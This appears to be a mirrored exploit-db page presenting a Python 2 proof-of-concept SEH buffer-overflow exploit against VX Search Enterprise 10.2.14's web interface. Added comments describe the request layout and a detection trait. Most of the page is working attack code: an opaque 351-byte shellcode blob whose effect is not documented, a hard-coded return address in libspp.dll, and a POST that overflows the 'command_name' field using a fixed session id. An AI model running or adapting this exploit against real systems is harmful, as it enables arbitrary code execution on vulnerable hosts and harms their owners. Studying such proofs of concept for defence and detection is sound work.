VX Search 10.2.14 – ‘command_name’ Buffer Overflow

  • 作者: W01fier00t
    日期: 2017-12-05
  • 来源:https://www.exploit-db.com/exploits/43209/
  • #!/usr/bin/python
    
    
    # Proof-of-concept script from exploit-db 43209, written in Python 2 syntax
    # (print statement, urllib2). It submits a single oversized `command_name`
    # form field to the VX Search web interface on 127.0.0.1. Nothing below
    # inspects the target's reply, so the closing "DONE" line is printed
    # regardless of what happened on the other side.
    print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"
    
    # Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
    # Discovery by: W01fier00t
    # Twitter : @wolfieroot
    # Discovery Date: 22/11/2017
    # Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
    # Tested Version: 10.2.14
    # Tested on OS: Windows 7 Home Edition sp1
    # You will need to enable web server for this to work.
    # You will also need the Login to VX Search wepage, for this to work.
    
    import urllib
    import urllib2
    import socket
    
    #Bad chars \x00\x0a\x0d
    #Payload size: 351 bytes
    # Opaque byte blob: 23 lines of 15 bytes plus a final line of 6, i.e. 351
    # bytes, which matches the size noted above. What it does when executed is
    # not documented anywhere in this file.
    shellcode = (
    "\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
    "\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36"
    "\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66"
    "\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0"
    "\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37"
    "\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42"
    "\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b"
    "\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07"
    "\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9"
    "\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94"
    "\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7"
    "\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda"
    "\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56"
    "\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85"
    "\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74"
    "\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1"
    "\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe"
    "\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab"
    "\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57"
    "\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde"
    "\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e"
    "\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3"
    "\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f"
    "\xc7\x24\x7d\x0c\xe7\x6c")
    
    #0x1001a136 : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [libspp.dll]
    # Layout of the overflowing field, 532 bytes in total:
    #   16 x 0x90 padding, the 351-byte blob above, 157 x 'A' filler, the two
    #   bytes \xEB\x06, 2 x 'B', and finally the 4-byte little-endian encoding
    #   of the 0x1001a136 address named in the comment above.
    # Every offset is hard-coded for the build listed in the header (10.2.14 on
    # Windows 7 SP1). From a detection standpoint the distinguishing trait of
    # this request is a `command_name` value several hundred bytes long made
    # largely of non-printable bytes (percent-encoded on the wire by urlencode
    # below).
    cmdname = "\x90" *16
    cmdname += shellcode
    cmdname += "A" * 157
    cmdname += "\xEB\x06"
    cmdname += "B" *2
    cmdname += "\x36\xa1\x01\x10"
    
    print " [*] Sending payload!..."
    # The `sid` query value is a fixed, hard-coded string: the script performs
    # no login of its own, so (per the header note about needing to be logged
    # in) the request only reaches the handler if this value matches a live
    # session on the target.
    url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
    values = {'command_name' : cmdname}
    data = urllib.urlencode(values)
    # Passing `data` makes urllib2 send the request as a POST.
    req = urllib2.Request(url, data)
    
    # A one-second read timeout is treated as the expected outcome (presumably
    # because the target stops answering); any other urllib2.URLError is not
    # caught and aborts the script. `response` is assigned but never read.
    try:
    	response = urllib2.urlopen(req, timeout = 1)
    except socket.timeout:
    	pass
    
    # Printed unconditionally; it does not indicate success.
    print " [*] DONE! :D\n"